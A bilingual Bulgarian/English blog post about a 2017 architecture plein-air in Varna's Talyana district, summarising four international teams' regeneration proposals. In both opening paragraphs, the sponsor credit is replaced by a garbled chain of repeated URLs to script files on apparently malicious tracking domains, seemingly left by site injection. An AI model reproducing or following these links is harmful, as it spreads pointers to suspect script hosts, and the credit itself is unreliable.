Публикувано на 06.10.2017 / 11:43

ПРОЕКТИ/PROJECTS АРХИТЕКТУРЕН ПЛЕНЕР Хвани се в Таляна/Get Captured By Talyana 27.09-03.10

В Деня на Архитектурата, на 2 октомври тази година, заедно с прегледа на варненската архитектурна колегия, завърши ХВАНИ СЕ В ТАЛЯНА – пленерът, който се надяваме, че ще поднови традицията от 80-те години. … с благодарности към всички участници, организатори, помощници, спонсори и основната подкрепа на https://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&varna2017.bg/bg

On the Architecture Day, on 2nd October this year, during the preview of the Varna Architectural College, the plein-air „GET CAPTURED BY TALYANA“was completed successfully, which we hope will restore the 80’s tradition. With thanks to the participants, organizers, sponsors, volunteers and the support of https://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&count.trackstatisticsss.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&clon.collectfasttracks.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&varna2017.bg/bg

ВСИЧКИ ПРОЕКТИ МОЖЕТЕ ДА РАЗГЛЕДАТЕ ТУК

ALL THE PROJECT CAN BE FOUND HERE


Екип А
BUILD UN-DO-BUILD TALYANA

арх. Максим Недков (България)
арх. Аднан Мемет (Румъния)
арх. Себастиан Йонеску (Румъния)

„Таляна“ е една неработеща градска зона. Тя се намира в самия център на Варна, но е неатрактивна и сякаш изолирана от почти всичко. Ако като архитекти съумеем да решим част от проблемите на района, сме сигурни, че той изключително бързо може да се превърне в една ключова част от градската тъкан.
Предлагаме няколко конкретни стъпки. Създаваме адекватни връзки с пешеходната градска зона, жп гара, подхода към морска гара и Римски терми. Регулираме автомобилното движението в квартала, като се концентрираме в ограничаване на паркирането. Освобождаваме повече място за хората. Даваме предложения на кои конкретни места можем да създадем сгради, които да допълнят архитектурния облик на „Таляна“, да направят по-приветливи улиците пред себе си и да ни поканят в полускритите си вътрешни дворове. Акцент на проекта е въпросът: как можем да дадем живот на рушащи се емблематични сгради и за какво можем да ги използваме. Предлагаме варианти как да поканим младите хора в „Таляна“ – деца, студенти и млади предприемачи. Споделените жилищни и работни пространства – coliving i coworking са едно удачно средство нашият „талян“ да бъде уютно, перспективно и желано градско пространство.
Ако успеем с „Таляна“, се надяваме успешнният опит да зарази малко по малко целия ни град.

А1 team Talyana

А2 team Talyana

A3 team Talyana


Екип Б
ОТВЪД „ТАЛЯНА”

арх. Нона Цекова (България)
арх. Цветан Цеков (България)
арх. Оана Абалару (Румъния)
арх. Кристина Балтой (Румъния)

Стратегията се разделя на няколко постепенни етапа и се развива около идеята за неизвестните пространства и маршрути на квартала.
Първият се фокусира върху подчертаване на съществуващите качества на средата както и привличане на внимание към тези от тях, които са на път да бъдат загубени – занемарени и неизползвани въртрешни дворове, тупикови улици, превътнати в паркинги, пасажи, занемарени обществени пространства и фасади на културни паметници.
Проектът предвижда това да стане посредством мислена мрежа – „Талян” – привличаща посетители от периферията на квартала и други части на града. Тя ще се състои от маркирани ключови точки, свързани по между си в динамични маршрути. Точките ще се материализират под формата на интерактивни осветителни и обозначителни тела, насочващи посетителите към актулните за момента събития (временни дейности с минимална инвазия на съществуващата среда) – местните музеи, галерии, театри, училища ще участват в тях под формата на изнесени изложби и събития, интервенции с градски дизайн, прожекции и други.
Обитателите на квартала ще бъдат окуражени да посрещнат свят малко по-различен от ежедневните им възприятия, същевременно получавайки както материална, така и душевна удовлетвореност.
В следващи етапи паркирането ще е позволено само за живущите в квартала, ще се появят улици със смесено ползване и бавно автомобилно движение, или изцяло зарворени за таковo. Предвиждат се околовръстни буферни паркинги, като например в настоящата пристанищна зона.
Във финалните етапи се очаква привличане на по-големи инвестиции, след повишаване на обществения и личен интерес и отговорност, с възможност за стартитане на цялостния реставрационен процес за сгради и улици и съживяване на един загиващ квартал.


Екип С
„В мрежата на Таляна“

арх. Александра Стойка (Румъния),
урб. Кристина Злота (Румъния),
арх. Дарина Славова (България)
арх. Александра Бабунска (България)

Проектът „В мрежата на Таляна“ е насочен към разкриването на скрития потенциал на историческото ядро на града чрез създаването на организация – мрежа, свързваща различни креативни и иновативно мислещи личности, институции, представители на бизнеса и собствениците на имоти в района, обединени около обща цел за превръщане на „Таляна“ в част от града с разпознаваема артистична идентичност и превръщането на зоната в притегателно място.
Визията за „Таляна“ като оживено предимно пешеходно градско пространство, със запазена и изпълнена с ново съдържание архитектурно-историческа среда поставя в своя фокус хората, носители на промяната и ги поставя в отговорната роля на „местни герои“, в чиито ръце е да открият общите ценности, инициативи и бизнес модели, които постепенно и въвличайки по-широк кръг от обществото, по естествен път да регенерират градската тъкан.
Предложеното решение за постепенното превръщане на улиците в района в алтернативно споделено работно пространство чрез специално разработено за целта градско обзаваждане, би превърнало зоната не само в притегателна туристическа дестинация, но и атрактивно място за активна „творческа“ почивка, провеждане на работилници и културни събития на открито.
Формализираната организация, подкрепяща едновременно развитието на млади творци, артистичното трансформиране на градски пространства и иновативни бизнес модели, системата от модулни елементи, които освен идентичност и функция за създаване на повече уютни пространства за престой на пешеходците може да бъде прилагана поетапно и доизграждана с участието на широк кръг от хора, както и организирането на фестивали и събития в градската среда, са част от решенията, предложени от международния екип на архитекти и урбанисти от България и Румъния . С тях те вярват, че съществуващите предизвикателства с автомобилния трафик, изчезващото архитектурно наследство и пустеещите и неподдържани пространства в центъра на града могат да открият своите иновативни решения.

TEAM C


ЕКИП Д
S.O.S. ТАЛЯНА /БЕЗОПАСНОСТ&ОТКРИТИ ПРОСТРАНСТВА&СОЦИАЛИЗАЦИЯ/

арх. Андрей Компанашойу (Румъния)
арх. Константин Златаров (България)
арх. Невена Вълчева (България)
арх. Флорин Мику (Румъния)
Започнахме с идеята за обща достъпност и безопасност. Неорганизираните паркинги и опасните сгради и фасади не допринасят за един жив и функциониращ квартал. Втората ни стъпка беше да развием транспортни връзки, които да преминават покрай или през „Таляна“. Въпреки, че района е в голяма близост до центъра, обществения транспорт го заобикаля. Освен това смятаме, че с намаляването на паркоместата и автомобилния поток е нужно да предложим алтернатива.
След като „Таляна“ е обезопасен и свързан с града, следва да се започне работа по новите публични пространства. Предложенията на екипа са следните-пешеходни улици без препятствия-коли, стърчащи плочки, саксии и градска мебел с лошо позициониране; площади с функция, магазини, паркове, амфитеатри за кино и представления на открито; работилници за изкуства и бит.

D1 TEAM Talyana

D2 TEAM Talyana


Team A
BUILD UN-DO-BUILD TALYANA

arch. Maksim Nedkov (Bulgaria)
arch. Adnan Memet (Romania)
arch. Sebastian Ionescu (Romania)
„Talyana“ is a problematic urban space. Situated in the city center it is unattractive and isolated. If we manage to solve or reduce part of the urban problems, using our architects toolbox, we guarantee, that Talyana can get an important urban area.
We propose some specific steps: First we do better connections to the following public areas: city center, central railway station, roman therms and harbour. We reduce traffic in the area, focusing on the parking problem. As a result we create more place for people.
We propose where we can add extra building, that can define better streets and pleasant courtyards. Main question is: How we can bring life to emblematic buildings in bad condition, preventing them from demolition? How we can use them in appropriate way?
We propose ideas how to attract young people in „Talyana“ – children, students and young investors? Creating coliving and coworking spaces is useful tool, that can help us to make „Talyana“ an attractive part of the city.
If we manage to do improve the life quality in „Talyana“ using our architecture methods, that can have viral effect to other city zones.


Team B
„TALYANA” BEYOND LIMITS

arch. Nona Tsekova (Bulgaria)
arch. Tsvetan Tsekov (Bulgaria)
arch. Oana Abalaru (Romania)
arch. Cristina Baltoi (Romania)

The concept resolves around the idea of vague spaces, which are the result of the transformation of the built environment over the decades. The existing spatial management varies from built to unbuilt, from private to public, from representative to humble, from historical to contemporary.
The master plan is made with a holistic vision in a rather simplistic way, emphasizing the existing qualities of the area and the cultural heritage that became harder to trace.
The strategy is developed on the hidden net that provides the very structure of the neighborhood, a „TALYAN”, formed by nodes, tied by paths. The key component is the space in between, space that has not a defined character and is often considered residual: back of the courtyards, the streets turned into parking, the passages, the inner courtyards, the decaying facades of the historical buildings.
We identified two main typologies of vague spaces: routes and patios.
The first stage of the strategy, connects, cleans and raises awareness, by proposing temporary activities with minimal impact, using the existing framework. The small interventions are thought also in colaboration with main cultural and educational venues in the area (like museums, galleries, theatres, schools, etc.) Public target groups are therefore mainly families with kids, students, etc.
The inhabitants are encouraged to encounter a world behind their every day perception- the gates that are usually closing the yards are now open, owners take care of their gardens, alternative pedestrian routes lead to pop-up events inside patios. Light installation are proposed on the streets and in the patios. A small part of the public space is recovered from parking through temporary platforms.The inhabitants of the area are challenged to interact with visitors through workshops and learning events. Parking is permitted only for local residents.
In the second phase the framework is consolidated into a continuous slow mobility network. The interest for the available space in the area can activate some of existing buildings for commercial, cultural and educational activities. In the future the parking space for the central space can be provided by the reprogrammed function of the space, available in the harbor.
In the third phase the area can attract major investments and the restoration process can begin for the historical monuments. It is a stage when TALYANA can also attract permanent new residents.
We have tried to foresee a future for the neighborhood that could preserve its historical heritage layers through the process of firstly creating a strong community.


Team C
„In the net of Talyana“

arch. Alexandra Stoica (Romania)
urb. Cristina Zlota (Romania)
arch. Darina Slavova (Bulgaria)
arch. Alexandra Babunska (Bulgaria)

Value proposition
The „In the net of Talyana“ project aims to reactivate the hidden potential of the city’s historic core using the creative community involvment approach.
Vision
By creating a network connecting different creative and innovative people, institutions, business representatives and property owners in the area, the project unites all urban stakeholders with the common goal to turn Talyana into a part of the city with a recognizable creative identity that would transform the area into an attractive place.
Who
The vision of „Talyana“ as a lively city area with an unique heritage focuses on the people who can make the change and puts them in the responsible role of „local heroes“ in whose hands are to be discovered common values, local initiatives, start-ups and responsible business models that can engage a wider community in regenerating the urban fabric.
Intervention
The system of modular elements for the public space brings not only identity and create more cozy spaces for pedestrian to stay, but also can be implemented in stages and built with the participation of a wide range of people.
The gradual transformation the public and residual spaces into alternative co-working and active „creative“ recreation spaces for residents, a new programs of workshops, open-air events and community festivals in the urban environment that would make the area become a tourist destination through, are part of the solutions proposed by the international team of bulgarian and romanian architects.
They believe in the innovative solutions of the creative community to solve the existing challenges of road traffic, the abandonment of the architectural heritage and of empty spaces in the city center tagged as Talyana.


PROJECT D
S.O.S. TALYANA /SAFETY&OPEN SPACES&SOCIALIZATION/

arch. ANDREI CUMPANASOIU (Romania)
arch. KONSTANTIN ZLATAROV (Bulgaria)
arch. NEVENA VALCHEVA (Bulgaria)
arch. FLORIN MICU (Romania)

The project started with the concept of general accessibility and safety. The unorganized parking and the dangerous buildings and façades do not add very well towards a lively and functioning neighborhood. The second step was to develop a public transport link passing through or next to “Talyana”. Although located near the center of Varna, the public transport routes go around. In addition, the planned reduction of vehicle access to the area would require an alternative.
After the area is secured and connected more effectively to the rest of the city-the organization of public spaces can begin. The team had several suggestions-pedestrian streets without obstructions and hazards, hindering urban furniture; micro squares with a function; shops; amphitheaters for outdoor cinema and performances; workshops for arts and DIY.


 

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *